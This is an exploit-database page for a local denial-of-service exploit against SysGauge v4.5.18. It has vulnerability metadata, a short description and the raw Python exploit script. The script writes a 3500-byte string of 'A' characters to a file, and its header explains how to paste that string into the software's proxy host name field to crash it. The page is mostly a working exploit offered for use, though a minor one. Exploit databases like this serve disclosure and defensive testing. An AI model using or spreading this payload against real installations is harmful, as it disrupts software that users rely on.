header-logo
Suggest Exploit
vendor:
SysGauge
by:
Hashim Jawad
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: SysGauge
Affected Version From: SysGauge v4.5.18
Affected Version To: SysGauge v4.5.18
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

SysGauge v4.5.18 – Local Denial of Service

The exploit creates a file with a payload of 3500 bytes, causing a denial of service on the vulnerable software SysGauge v4.5.18. The payload is created by writing 'A' 3500 times to a file named payload.txt.

Mitigation:

Source

Exploit-DB raw data:

#!/usr/bin/python
############################################################################################
# Exploit Title       : SysGauge v4.5.18 - Local Denial of Service                         #
# Exploit Author      : Hashim Jawad                                                       #
# Twitter             : @ihack4falafel                                                     # 
# Author Website      : ihack4falafel[.]com                                                #
# Vendor Homepage     : http://www.sysgauge.com/                                           #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgauge_setup_v4.5.18.exe          #
# Note                : SysGauge Pro and Ultimate v4.5.18 are also vulnerable              #
# Steps to Reproduce  : ~ Copy content of payload.txt                                      # 
#                       ~ Select Manual proxy configuration under Options->Proxy           #
#                       ~ Paste content in 'Proxy Server Host Name' field and click Save   #
############################################################################################

buffer = "A" * 3500

try:
    f=open("payload.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
cqrsecured